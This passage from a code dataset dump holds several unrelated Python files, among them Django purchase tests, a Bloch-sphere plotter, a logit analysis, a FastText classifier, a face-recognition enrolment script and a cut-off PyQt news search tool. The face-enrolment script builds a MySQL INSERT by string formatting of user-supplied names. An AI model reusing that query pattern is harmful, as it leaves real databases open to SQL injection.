U,V,b_h,W,b = train(loader,p=2,h=h,n = n,n_epoch=300)\n y_predict = predict(th.Tensor(X),U,V,b_h,W,b)\n assert np.allclose(y_predict, Y)\n\n","sub_path":"homework3/test3.py","file_name":"test3.py","file_ext":"py","file_size_in_byte":17483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"582073176","text":"#DenishaRamaloo\r\n#StudentNumber:RMLDEN001\r\n\r\n#to create an empty list\r\nstrings=[]\r\n\r\n#to get a list of names\r\nstring=input(\"Enter strings (end with DONE):\\n\")\r\nwhile string !=\"DONE\":\r\n strings.append(string)\r\n string=input(\"\")\r\nx=0\r\n#arranged names to be right-aligned\r\nfor string in strings:\r\n y=len(string)\r\n if y>x:\r\n x=y\r\n#print out string \r\nprint(\"\\nRight-aligned list:\")\r\nfor string in strings:\r\n \r\n print(\" \"*(x-len(string)),string, sep=\"\")\r\n \r\n\r\n","sub_path":"examples/data/Assignment_6/rmlden001/question1.py","file_name":"question1.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"212426105","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.7-x86_64/egg/spm1d/rft1d/examples/val_max_0_gaussian_1d.py\n# Compiled at: 2019-08-22 04:37:04\n# Size of source mod 2**32: 956 bytes\nimport numpy as np\nfrom matplotlib import pyplot\nfrom spm1d import rft1d\nnp.random.seed(123456789)\nnResponses = 10000\nnNodes = 101\nFWHM = 10.0\ny = rft1d.randn1d(nResponses, nNodes, FWHM)\nymax = y.max(axis=1)\nheights = np.linspace(2, 4, 21)\nsf = np.array([(ymax > h).mean() for h in heights])\nsfE = rft1d.norm.sf(heights, nNodes, FWHM)\nsfN = rft1d.norm.sf0d(heights)\npyplot.close('all')\nax = pyplot.axes()\nax.plot(heights, sf, 'o', label='Simulated')\nax.plot(heights, sfE, '-', label='Theoretical')\nax.plot(heights, sfN, 'r-', label='Standard normal')\nax.set_xlabel('x', size=16)\nax.set_ylabel('$P (z_\\\\mathrm{max} > x)$', 
size=20)\nax.legend()\nax.set_title('Gaussian univariate validation (1D)', size=20)\npyplot.show()","sub_path":"pycfiles/spm1d-0.4.2-py3.6/val_max_0_gaussian_1d.cpython-36.py","file_name":"val_max_0_gaussian_1d.cpython-36.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"604519912","text":"\n\n#calss header\nclass _WAYWARD():\n\tdef __init__(self,): \n\t\tself.name = \"WAYWARD\"\n\t\tself.definitions = [u'doing only what you want and often changing your behaviour in a way that is difficult to control']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'adjectives'\n\n\n\tdef run(self, obj1, obj2):\n\t\tself.jsondata[obj2] = {}\n\t\tself.jsondata[obj2]['properties'] = self.name.lower()\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/adjectives/_wayward.py","file_name":"_wayward.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"441133458","text":"import pubchempy as pcp\nimport asyncio\nimport json\n\n\ndef read_cid(i):\n \"\"\"\n read the cid file\n \"\"\"\n data = dict()\n with open('cid/cid_nsc_' + str(i) + '.json', 'r') as file:\n data = json.load(file)\n\n return data\n\ndef graph_downloader():\n cnt = [0]\n\n def img_downloader(cid, nsc):\n \"\"\"\n download the png image from pubchem, the naming of the image: nsc_number.png\n \"\"\"\n if(nsc != 'not_found'):\n pcp.download('PNG', 'graph/' + nsc + '.png', cid, overwrite=True)\n print(\"Item \" + str(cnt[0]) + \" is completed\")\n cnt[0] += 1\n\n for i in range(178):\n cnt = [0]\n nsc_cid = read_cid(i)\n for nsc in nsc_cid:\n img_downloader(nsc_cid[nsc], nsc)\n print(\"Crawling the file cid_nsc_{} is completed\".format(i))\n\n\nif __name__ == \"__main__\":\n graph_downloader()\n","sub_path":"graph_downloader.py","file_name":"graph_downloader.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"561282227","text":"import random as rand\nimport os\nimport string\nimport unittest\n\nfrom django.contrib.sessions.middleware import SessionMiddleware\nfrom django.test import Client\nfrom django.core.wsgi import get_wsgi_application\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Alejandria.settings')\napp = get_wsgi_application()\nfrom django.test import RequestFactory\nfrom books.models import User, Address, Cart, Book, Guest, BankAccount, Bill\nimport random\nfrom books.views import delete_product, add_product, complete_purchase, generate_pdf, PaymentView\n\n\n\ndef random_char(y):\n return ''.join(random.choice(string.ascii_letters) for x in range(y))\n\n\ndef create_user(random_user=False):\n \"\"\" Test if creation of Users has any error, creating or storing the information\"\"\"\n # Data to test\n if random_user:\n _id = random.randint(0, 654891898)\n else:\n _id = 1\n role = 'Admin'\n name = 'Josep'\n if random_user:\n username = str(random.randint(0, 5156123423456015412))[:12]\n else:\n username = 'user'\n\n password = 'password1'\n email = 'fakemail@gmail.com'\n user_address = Address(city='Barcelona', street='C/ Test, 112', country='Spain', zip='08942')\n fact_address = Address(city='Barcelona', street='C/ Test, 112', country='Spain', zip='08942')\n user_address.save()\n fact_address.save()\n\n # Model creation\n obj = User(id=_id, role=role,\n 
username=username,\n name=name,\n password=password,\n email=email,\n user_address=user_address,\n fact_address=fact_address)\n obj.save()\n\n cart = Cart(user_id=obj)\n cart.save()\n\n return obj\n\ndef get_or_create_user():\n user_query = User.objects.filter(id=1000)\n if user_query.count() == 0:\n user_address = Address(city='Barcelona', street='C/ Test, 112', country='Spain', zip='08942')\n fact_address = Address(city='Barcelona', street='C/ Test, 112', country='Spain', zip='08942')\n user = User(id=1000, role='Admin', username='Test User Cart', name='Test',\n password='password1', email='fakemail@gmail.com', user_address=user_address,\n genre_preference_1='CRIM', genre_preference_2='FANT', genre_preference_3='KIDS',\n fact_address=fact_address)\n user_address.save()\n fact_address.save()\n user.save()\n else:\n user = user_query.first()\n return user\n\n \ndef get_or_create_guest():\n device = '123456789'\n guest_query = Guest.objects.filter(device=device)\n if guest_query.count() == 0:\n guest = Guest(device=device)\n guest.save()\n else:\n guest = guest_query.first()\n return guest\n\n\ndef get_or_create_books(user, n):\n books_query = Book.objects.filter()\n books = []\n if books_query.count() < 3:\n ISBNs = [str(i) for i in range(n)]\n titles = [random_char(5) for i in range(n)]\n for i in range(len(titles)):\n book = Book(ISBN=ISBNs[i], user_id=user, title=titles[i], description='', author='', price=30,\n language='Spanish', publisher='', num_pages=200, num_sold=100, primary_genre=\"FANT\",\n secondary_genre=\"OTHR\", recommended_age=\"Juvenil\")\n books.append(book)\n book.save()\n else:\n for b in books_query:\n books.append(b)\n return books\n\n\ndef get_or_create_guest_cart(guest):\n cart_query = Cart.objects.filter(guest_id=guest)\n if cart_query.count() == 0:\n cart = Cart(guest_id=guest)\n cart.save()\n else:\n cart = cart_query.first()\n return cart\n\n\ndef get_or_create_user_cart(user):\n cart_query = Cart.objects.filter(user_id=user)\n if cart_query.count() == 0:\n cart = Cart(user_id=user)\n cart.save()\n else:\n cart = cart_query.first()\n return cart\n\n\ndef test_add_product():\n user = get_or_create_user()\n cart = get_or_create_user_cart(user)\n books = get_or_create_books(user, 5)\n\n book = books[0]\n\n body = {\n 'user': user\n }\n\n req = RequestFactory().post(\"/cart/\", body)\n guest = get_or_create_guest()\n req.COOKIES['device'] = guest.device\n req.user = user\n add_product(req, 'cart', book.ISBN)\n assert cart.books.filter(ISBN=book.ISBN).last().ISBN == book.ISBN\n\n\ndef test_delete_product():\n user = get_or_create_user()\n cart = get_or_create_user_cart(user)\n books = get_or_create_books(user, 5)\n\n book = books[0]\n\n body = {\n 'user': user\n }\n\n req = RequestFactory().post(\"/cart/\", body)\n guest = get_or_create_guest()\n req.COOKIES['device'] = guest.device\n req.user = user\n delete_product(req, book)\n assert cart.books.filter(ISBN=book.ISBN).last() is None\n\n\ndef test_add_product_guest():\n guest = get_or_create_guest()\n cart = get_or_create_guest_cart(guest)\n user = get_or_create_user()\n books = get_or_create_books(user, 5)\n\n book = books[0]\n\n body = {}\n\n req = RequestFactory().post(\"/cart/\", body)\n req.COOKIES['device'] = guest.device\n req.user = None\n add_product(req, 'cart', book.ISBN)\n assert cart.books.filter(ISBN=book.ISBN).last().ISBN == book.ISBN\n\n\ndef test_delete_product_guest():\n guest = get_or_create_guest()\n cart = get_or_create_guest_cart(guest)\n user = User()\n books = get_or_create_books(user, 
5)\n\n    book = books[0]\n\n    body = {}\n\n    req = RequestFactory().post(\"/cart/\", body)\n    req.COOKIES['device'] = guest.device\n    req.user = None\n    delete_product(req, book)\n    assert cart.books.filter(ISBN=book.ISBN).last() is None\n\n\ndef push_some_products(user):\n    cart = Cart.objects.get(user_id=user)\n    books = Book.objects.all()\n    cart.books.add(books[0])\n    cart.books.add(books[1])\n    cart.save()\n    return books[0].price + books[1].price\n\n\ndef get_or_create_user_bank_account(user):\n    bank_query = BankAccount.objects.filter(user=user)\n    if bank_query.count() == 0:\n        user_bank_account = BankAccount(user=user)\n        user_bank_account.save()\n    else:\n        user_bank_account = bank_query.first()\n    return user_bank_account\n\n\ndef test_complete_purchase():\n    user = create_user(random_user=True)\n    total_price = push_some_products(user)\n    user_bank_account = get_or_create_user_bank_account(user)\n    user_bank_account.save()\n\n    body = {\n        'user': user, 'username': 'User Name Test', 'month_exp': 11, 'year_exp': 2021, 'cardNumber': '1234567890123456',\n        'cvv': 111, 'redeemed_codes': 0\n    }\n\n    req = RequestFactory().post(\"/payment/\", body)\n    req.test = True\n    # RequestFactory does not run the middleware, so it must be added manually\n    # (complete_purchase needs the session)\n    middleware = SessionMiddleware()\n    middleware.process_request(req)\n    req.session.save()\n    req.user = user\n    cart = Cart.objects.get(user_id=user)\n    complete_purchase(request=req, kwarg=True)\n    bill = Bill.objects.filter(user_id=user).last()\n\n    req2 = RequestFactory().post(\"/pdf/\")\n    req2.user = user\n    generate_pdf(req2)\n    user_bank_account = get_or_create_user_bank_account(user)\n    assert cart.books.count() == 0 and user_bank_account.cvv == 111 and bill.total_money_spent == total_price\n\n\nclass SimpleTest(unittest.TestCase):\n    def test_context(self):\n        factory = RequestFactory()\n        request = factory.get('/payment')\n        request.user = create_user(random_user=True)\n        response = PaymentView.as_view()(request)\n        self.assertIsInstance(response.context_data, dict)\n        self.assertEqual(response.context_data['total_items'], 0)\n","sub_path":"books/test/test_buy.py","file_name":"test_buy.py","file_ext":"py","file_size_in_byte":7600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"277387048","text":"# Written by Akel Hashim.\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom matplotlib.patches import FancyArrowPatch\nfrom mpl_toolkits.mplot3d import proj3d\n\nclass Arrow3D(FancyArrowPatch):\n    def __init__(self, xs, ys, zs, *args, **kwargs):\n        \"\"\"Class for drawing a 3D arrow.\n        :param xs:\n        :type xs:\n        :param ys:\n        :type ys:\n        :param zs:\n        :type zs:\n        :param args:\n        :type args:\n        :param kwargs:\n        :type kwargs:\n        \"\"\"\n        FancyArrowPatch.__init__(self, (0, 0), (0, 0), *args, **kwargs)\n        self._verts3d = xs, ys, zs\n\n    def draw(self, renderer):\n        xs3d, ys3d, zs3d = self._verts3d\n        xs, ys, zs = proj3d.proj_transform(xs3d, ys3d, zs3d, renderer.M)\n        self.set_positions((xs[0], ys[0]), (xs[1], ys[1]))\n        FancyArrowPatch.draw(self, renderer)\n\n\nclass BlochSphere:\n\n    def __init__(self,\n                 figsize=(10, 10),\n                 label_fontsize=35,\n                 tick_label_fontsize=20,\n                 point_size=60,\n                 point_alpha=1.0,\n                 show_background_grid=True,\n                 show_background=True,\n                 rotation_angle=45):\n        \"\"\"\n        Class for plotting points and vectors on the Bloch Sphere.\n        :param figsize: figure size for Bloch Sphere (default: (10,10))\n        :type figsize: tuple\n        :param label_fontsize: fontsize for x-, y-, z-labels (default: 35)\n        
:type label_fontsize: int\n :param tick_label_fontsize: fontsize for x-, y-, z-ticks (default: 20)\n :type tick_label_fontsize: int\n :param point_size: point size for scatter plots\n :type point_size: int\n :param point_alpha: opacity for points in scatter plots\n :type point_alpha: float\n :param show_background_grid: display x, y, z grids behind Bloch sphere\n :type show_background_grid: bool\n :param show_background: display background behind Bloch sphere\n :type show_background: bool\n :param rotation_angle: angle about the z-axis to rotate the Bloch sphere for viewing\n :type rotation_angle: int\n \"\"\"\n\n self.figsize = figsize\n self.label_fontsize = label_fontsize\n self.tick_label_fontsize = tick_label_fontsize\n self.point_size = point_size\n self.point_alpha = point_alpha\n self.show_background_grid = show_background_grid\n self.show_background = show_background\n self.rotation_angle = rotation_angle\n\n self.fig = None\n\n def draw_bloch_sphere(self):\n \"\"\"Draws an empty Bloch sphere.\"\"\"\n phi = np.linspace(0, 2 * np.pi, 50)\n theta = np.linspace(0, np.pi, 50)\n PHI, THETA = np.meshgrid(phi, theta)\n\n x_sphere = np.sin(PHI) * np.cos(THETA)\n y_sphere = np.sin(PHI) * np.sin(THETA)\n z_sphere = np.cos(PHI)\n\n self.fig = plt.figure(figsize=self.figsize)\n self.ax = plt.axes(projection='3d')\n self.ax.plot_wireframe(x_sphere, y_sphere, z_sphere, rstride=1, cstride=1, color='k', alpha=0.1, linewidth=1)\n self.ax.plot([-1, 1], [0, 0], [0, 0], c='k', alpha=0.5)\n self.ax.plot([0, 0], [-1, 1], [0, 0], c='k', alpha=0.5)\n self.ax.plot([0, 0], [0, 0], [-1, 1], c='k', alpha=0.5)\n self.ax.plot(np.cos(phi), np.sin(phi), 0, c='k', alpha=0.5)\n self.ax.plot(np.zeros(50), np.sin(phi), np.cos(phi), c='k', alpha=0.5)\n self.ax.plot(np.sin(phi), np.zeros(50), np.cos(phi), c='k', alpha=0.5)\n self.ax.set_xlabel(r'$\\langle x \\rangle$', fontsize=self.label_fontsize)\n self.ax.set_ylabel(r'$\\langle y \\rangle$', fontsize=self.label_fontsize)\n self.ax.set_zlabel(r'$\\langle z \\rangle$', fontsize=self.label_fontsize)\n self.ax.set_xlim(-1, 1)\n self.ax.set_ylim(-1, 1)\n self.ax.set_zlim(-1, 1)\n self.ax.set_xticklabels(['-1', '', '', '', '', '', '', '', '1'], fontsize=self.tick_label_fontsize)\n self.ax.set_yticklabels(['-1', '', '', '', '', '', '', '', '1'], fontsize=self.tick_label_fontsize)\n self.ax.set_zticklabels(['-1', '', '', '', '', '', '', '', '1'], fontsize=self.tick_label_fontsize)\n self.ax.set_facecolor('white')\n self.ax.grid(self.show_background_grid, color='k')\n if self.show_background is False:\n self.ax.set_axis_off()\n if self.rotation_angle is not None:\n self.ax.view_init(30, self.rotation_angle)\n\n def add_points(self, points, color=None):\n \"\"\"Adds points to the Bloch sphere.\n :param points: [x, y, z] coordinates for a point\n Each can be an individual list of multiple coordinates for multiple points.\n :type points: list|np.array\n :param color: color of points for scatter point (default: None)\n :type color: None|str|RGB\n \"\"\"\n \"\"\"Add points to the Bloch Sphere.\"\"\"\n if self.fig is None:\n self.draw_bloch_sphere()\n\n x, y, z = points\n if color is None:\n self.ax.scatter3D(x, y, z, s=self.point_size, alpha=self.point_alpha)\n else:\n self.ax.scatter3D(x, y, z, s=self.point_size, alpha=self.point_alpha, color=color)\n\n def add_vector(self, vector, color=None):\n \"\"\"Add a vector to the Bloch sphere.\n :param vector: [x, y, z] coordinates for the tip of a vector\n :type vector: list|np.array\n :param color: color of vector (default: None)\n 
:type color: None|str|RGB\n :return:\n :rtype:\n \"\"\"\n \"\"\"Add points to the Bloch Sphere.\"\"\"\n if self.fig is None:\n self.draw_bloch_sphere()\n\n x, y, z = vector\n if color is None:\n p = self.ax.plot([0, x], [0, y], [0, z], linewidth=3)\n a = Arrow3D([0, x], [0, y], [0, z], mutation_scale=35, arrowstyle='-|>', color=p[0].get_color())\n else:\n self.ax.plot([0, x], [0, y], [0, z], linewidth=3, color=color)\n a = Arrow3D([0, x], [0, y], [0, z], mutation_scale=35, arrowstyle='-|>', color=color)\n self.ax.add_artist(a)\n\n def show(self, save=False, directory=None, filename=None):\n \"\"\"Plot the Bloch Sphere in a figure.\n :param save: save the figure (default: False\n :type save: bool\n :param directory: directory in which the save the figure (default: None)\n If None, it will save in the current directory.\n :type directory: None|str\n :param filename: string to prepend in front for 'Bloch_sphere.png' for a filename\n :type filename: None|str\n \"\"\"\n if self.fig is None:\n self.draw_bloch_sphere()\n plt.tight_layout()\n if save is True:\n plt.savefig(f'{directory}{filename}Bloch_sphere.png', dpi=300)\n plt.show()","sub_path":"pypulse/visualization/bloch.py","file_name":"bloch.py","file_ext":"py","file_size_in_byte":6783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"101627959","text":"def bmi_calc():\r\n num_cases = int(input())\r\n cases = map(lambda case: [float(case) for case in input().split()], range(num_cases))\r\n bmi_cases = map(lambda case: round(case[0] / pow(case[1], 2), 2), cases)\r\n result = []\r\n for bmi in bmi_cases:\r\n if bmi < 18.5:\r\n result.append('under')\r\n elif bmi < 25:\r\n result.append('normal')\r\n elif bmi < 30:\r\n result.append('over')\r\n else:\r\n result.append('obese')\r\n print(\" \".join(result))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n bmi_calc()\r\n","sub_path":"code_abbey/bmi.py","file_name":"bmi.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"261761952","text":"# The code below imports a few packages we will need for this analysis\nimport pandas as pd\nimport numpy as np\nimport pylab as pl\nimport statsmodels.api as sm\n\n# load the data\ndf = pd.read_csv(\"african_crises.csv\")\n# check out the first 5 rows of the dataset\n# print(df.head())\n# summarize the data\n# print(df.describe())\n\n# let several parameters become dummy\ndummy_domestic = pd.get_dummies(df[\"domestic_debt_in_default\"], prefix=\"domestic_debt_in_default\")\ndummy_sovereign = pd.get_dummies(df[\"sovereign_external_debt_default\"], prefix=\"sovereign_external_debt_default\")\ndummy_independence = pd.get_dummies(df[\"independence\"], prefix=\"independence\")\n# print(dummy_domestic,dummy_sovereign,dummy_independence)\n\n# create a clean data frame for the regression\ncols_to_keep = [\"systemic_crisis\", \"currency_crises\", \"inflation_crises\", \"banking_crisis\", \"exch_usd\", \"gdp_weighted_default\", \"inflation_annual_cpi\"]\ndata = df[cols_to_keep].join(dummy_domestic.loc[:,: \"domestic_debt_in_default_0\"]).join(dummy_sovereign.loc[:,: \"sovereign_external_debt_default_0\"]).join(dummy_independence.loc[:,: \"independence_0\"])\n# print(data.head())\n\n# manually add the intercept\ndata[\"intercept\"] = 1.0\n\n# extract independent variables\ntrain_cols = data.columns[4:]\n# print(train_cols)\n\n# fit the binary logit model\nlogit = sm.Logit(data[\"systemic_crisis\"], data[train_cols])\nresult = 
logit.fit()\n\n# display the results\nprint(result.summary())\n# odds ratios only\n# print(np.exp(result.params))\ni = int(input(\"Please input the number you want to analyze:\"))\nsystemic_crisis_Xib = result.params[6] + result.params[0] * data[\"exch_usd\"][i] + result.params[1] * data[\"gdp_weighted_default\"][i] \\\n + result.params[4] * data[\"sovereign_external_debt_default_0\"][i] + result.params[5] * data[\"independence_0\"][i]\nprint(np.exp(systemic_crisis_Xib)/(1 + np.exp(systemic_crisis_Xib))**2)\n# print(1/(1 + np.exp(-systemic_crisis_Xib)))\n\n# the same display with different dependent variable\nlogit = sm.Logit(data[\"currency_crises\"], data[train_cols])\nresult = logit.fit()\nprint(result.summary())\n# print(np.exp(result.params))\nlogit = sm.Logit(data[\"inflation_crises\"], data[train_cols])\nresult = logit.fit()\nprint(result.summary())\n# print(np.exp(result.params))\nlogit = sm.Logit(data[\"banking_crisis\"], data[train_cols])\nresult = logit.fit()\nprint(result.summary())\n# print(np.exp(result.params))","sub_path":"analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"320175672","text":"import numpy as np\nimport copy\n\nclass FastText_Classifier:\n def __init__(self, config, args):\n data_info = config.data_info[args.dataset]\n\n if args.ngram ==1:\n self.vocab_size = data_info.vocab_size_1\n else:\n self.vocab_size = data_info.vocab_size_2\n self.batch_size = config.train.batch_size\n\n self.hidden = config.train.hidden\n self.n_classes = data_info.classes\n\n self.W_in = 0.1 * np.random.randn(self.vocab_size, self.hidden)\n self.W_in[0] = 0 # padding value == 0\n self.W_out = np.random.randn(self.hidden, self.n_classes)\n self.b = np.random.randn(self.n_classes)\n\n def forward(self, x, label): # (batch_size, sentence_max_len)\n self.t = label\n self.x = x\n self.sum_sentence_vec = np.mean(self.W_in[x], axis=1) # (batch_size, sentence_max_len, hidden_size) -> (batch_size, hidden_size)\n output = np.dot(self.sum_sentence_vec, self.W_out) + self.b #(batch_size, n_classes)\n output = softmax(output)\n self.grad = copy.deepcopy(output)\n\n # accuracy\n y = np.argmax(output, axis=1) # (batch_size, )\n accuracy = len(y[y ==self.t])/len(y) * 100\n\n # loss\n loss = -np.sum(np.log(output[np.arange(len(self.t)), self.t]+1e-7))/len(self.t)\n return loss, accuracy\n\n def backward(self, learning_rate):\n self.grad[np.arange(len(self.t)), self.t] -= 1 # softmaxwithloss\n self.grad /= len(self.t)\n self.b -= learning_rate * np.sum(self.grad, axis=0)\n d_W_in_x = np.expand_dims(np.dot(self.grad, self.W_out.T), axis=1)\n self.W_out -= learning_rate * np.dot(self.sum_sentence_vec.T , self.grad)\n self.W_in[self.x] -= learning_rate * d_W_in_x\n self.W_in[0] = 0 # padding vector -> update xxx !\n return None\n\ndef softmax(x):\n max_ = np.max(x, axis=1, keepdims=True)\n exp_x = np.exp(x-max_)\n #exp_x = np.exp(x)\n exp_x_sum = np.sum(exp_x, axis=1, keepdims=True)\n return exp_x/exp_x_sum\n\n\n\n","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"568845291","text":"from tkinter import *\nfrom tkinter import messagebox\nimport cv2\nimport os\nfrom PIL import Image\nimport numpy as np\nimport mysql.connector\nfrom db_connect import *\n\nclass digiFaceTeacher1:\n def __init__(self,sal,tName,tID):\n self.tName = 
tName\n self.tID = tID\n self.sal = sal\n self.gui_1()\n\n def genDataset(self):\n mycursor = connection.cursor()\n mycursor.execute(\"SELECT * from digiFaceTeacher\")\n myresult = mycursor.fetchall()\n id = 1\n for x in myresult:\n id += 1\n sql = 'INSERT INTO digiFaceTeacher values(\"{}\",\"{}\",\"{}\",\"{}\")'.format(id, self.sal, self.tName, self.tID)\n mycursor.execute(sql)\n connection.commit()\n face_classifier = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\n\n def face_cropped(img):\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n faces = face_classifier.detectMultiScale(gray, 1.3, 5)\n # scaling factor=1.3\n # Minimum neighbor = 5\n\n if faces is ():\n return None\n for (x, y, w, h) in faces:\n cropped_face = img[y:y + h, x:x + w]\n return cropped_face\n\n cap = cv2.VideoCapture(0)\n img_id = 0\n\n while True:\n ret, frame = cap.read()\n if face_cropped(frame) is not None:\n img_id += 1\n face = cv2.resize(face_cropped(frame), (200, 200))\n face = cv2.cvtColor(face, cv2.COLOR_BGR2GRAY)\n file_name_path = \"dataTeacher/user.\" + str(id) + \".\" + str(img_id) + \".jpg\"\n cv2.imwrite(file_name_path, face)\n cv2.putText(face, str(img_id), (50, 50), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 255, 0), 2)\n # (50,50) is the origin point from where text is to be written\n # font scale=1\n # thickness=2\n\n cv2.imshow(\"Cropped face\", face)\n if cv2.waitKey(1) == 13 or int(img_id) == 200:\n break\n cap.release()\n cv2.destroyAllWindows()\n #messagebox.showinfo('Result', 'Generating dataset completed!!!')\n\n def trainData(self):\n data_dir = \"C:\\\\Users\\\\krite\\\\PycharmProjects\\\\DigiCollege\\\\dataTeacher\"\n path = [os.path.join(data_dir, f) for f in os.listdir(data_dir)]\n faces = []\n ids = []\n\n for image in path:\n img = Image.open(image).convert('L');\n imageNp = np.array(img, 'uint8')\n id = int(os.path.split(image)[1].split(\".\")[1])\n\n faces.append(imageNp)\n ids.append(id)\n ids = np.array(ids)\n\n # Train the classifier and save\n clf = cv2.face.LBPHFaceRecognizer_create()\n clf.train(faces, ids)\n clf.write(\"classifier.xml\")\n #messagebox.showinfo('Result', 'Training dataset completed!!!')\n\n def gui_1(self):\n self.genDataset()\n self.trainData()\n\n messagebox.showinfo(\"Done\", \"DigiFace has been setup successfully\")\n","sub_path":"digiFaceTeacher.py","file_name":"digiFaceTeacher.py","file_ext":"py","file_size_in_byte":3046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"428606531","text":"import datetime\nimport os\nimport sys\nfrom selenium import webdriver\nimport webbrowser\nfrom PyQt5.QtGui import QStandardItemModel\nfrom PyQt5.QtWidgets import *\n\n\nclass Form(QWidget):\n def __init__(self):\n super(Form, self).__init__()\n\n self.setWindowTitle(\"뉴스기사 검색 프로그램\")\n\n self.lst = []\n self.href = []\n self.page = 1\n cd = \"{}\\chromedriver\".format(os.path.dirname(os.path.realpath(__file__)))\n chOpt = webdriver.ChromeOptions()\n chOpt.add_argument(\"headless\")\n chOpt.add_argument(\"lang=ko_KR\")\n self.driver = webdriver.Chrome(cd, chrome_options=chOpt)\n\n self.lnKeyword = QLineEdit(\"파이썬\")\n\n self.rdSort_0 = QRadioButton(\"관련도\")\n self.rdSort_1 = QRadioButton(\"최신\")\n self.rdSort_2 = QRadioButton(\"오래된\")\n hbSort = QHBoxLayout()\n hbSort.addWidget(self.rdSort_0)\n hbSort.addWidget(self.rdSort_1)\n hbSort.addWidget(self.rdSort_2)\n grpSort = QGroupBox()\n grpSort.setLayout(hbSort)\n\n self.rdType_0 = QRadioButton(\"전체\")\n self.rdType_1 = QRadioButton(\"동영상\")\n self.rdType_2 = 
QRadioButton(\"포토\")\n self.rdType_3 = QRadioButton(\"지면기사\")\n hbType = QHBoxLayout()\n hbType.addWidget(self.rdType_0)\n hbType.addWidget(self.rdType_1)\n hbType.addWidget(self.rdType_2)\n hbType.addWidget(self.rdType_3)\n grpType = QGroupBox()\n grpType.setLayout(hbType)\n\n self.rdField_0 = QRadioButton(\"전체\")\n self.rdField_1 = QRadioButton(\"제목만\")\n hbFeild = QHBoxLayout()\n hbFeild.addWidget(self.rdField_0)\n hbFeild.addWidget(self.rdField_1)\n grpFeild = QGroupBox()\n grpFeild.setLayout(hbFeild)\n\n self.rdDate_0 = QRadioButton(\"전체\")\n self.rdDate_1 = QRadioButton(\"1일\")\n self.rdDate_2 = QRadioButton(\"1주\")\n self.rdDate_3 = QRadioButton(\"1개월\")\n self.rdDate_4 = QRadioButton(\"6개월\")\n self.rdDate_5 = QRadioButton(\"1년\")\n self.rdDate_6 = QRadioButton(\"선택\")\n self.dtStart = QDateEdit(datetime.date.today())\n self.dtEnd = QDateEdit(datetime.date.today())\n hbDate_0 = QHBoxLayout()\n hbDate_0.addWidget(self.rdDate_0)\n hbDate_0.addWidget(self.rdDate_1)\n hbDate_0.addWidget(self.rdDate_2)\n hbDate_1 = QHBoxLayout()\n hbDate_1.addWidget(self.rdDate_3)\n hbDate_1.addWidget(self.rdDate_4)\n hbDate_1.addWidget(self.rdDate_5)\n frmDateCustom = QFormLayout()\n frmDateCustom.addRow(\"시작: \", self.dtStart)\n frmDateCustom.addRow(\"종료: \", self.dtEnd)\n hbDate_2 = QHBoxLayout()\n hbDate_2.addWidget(self.rdDate_6)\n hbDate_2.addLayout(frmDateCustom)\n vbDate = QVBoxLayout()\n vbDate.addLayout(hbDate_0)\n vbDate.addLayout(hbDate_1)\n vbDate.addLayout(hbDate_2)\n grpDate = QGroupBox()\n grpDate.setLayout(vbDate)\n\n frm = QFormLayout()\n frm.addRow(\"검색어:\", self.lnKeyword)\n frm.addRow(\"정렬기준: \", grpSort)\n frm.addRow(\"기사유형: \", grpType)\n frm.addRow(\"검색범위: \", grpFeild)\n frm.addRow(\"검색기간: \", grpDate)\n\n self.model = QStandardItemModel(0, 1, self)\n self.model.setHorizontalHeaderLabels([\"기사 제목\"])\n self.table = QTableView()\n self.table.setModel(self.model)\n self.table.setColumnWidth(0, 450)\n self.table.setFixedSize(450, 350)\n self.btnNext = QPushButton(\"다음\")\n self.btnPrev = QPushButton(\"이전\")\n self.btnSearch = QPushButton(\"검색\")\n\n hbPageCnt = QHBoxLayout()\n hbPageCnt.addWidget(self.btnSearch)\n hbPageCnt.addStretch()\n hbPageCnt.addWidget(self.btnPrev)\n hbPageCnt.addWidget(self.btnNext)\n vbList = QVBoxLayout()\n vbList.addLayout(hbPageCnt)\n vbList.addWidget(self.table)\n\n hbMain = QHBoxLayout()\n hbMain.addLayout(frm)\n hbMain.addLayout(vbList)\n\n self.setLayout(hbMain)\n\n self.rdSort_0.toggle()\n self.rdType_0.toggle()\n self.rdField_0.toggle()\n self.rdDate_0.toggle()\n\n self.btnSearch.clicked.connect(self.searchNews)\n self.btnNext.clicked.connect(self.lstNext)\n self.table.clicked.connect(self.select)\n def lstNext(self):\n self.page += 10\n self.searchNews()\n\n def lstPrev(self):\n if self.page > 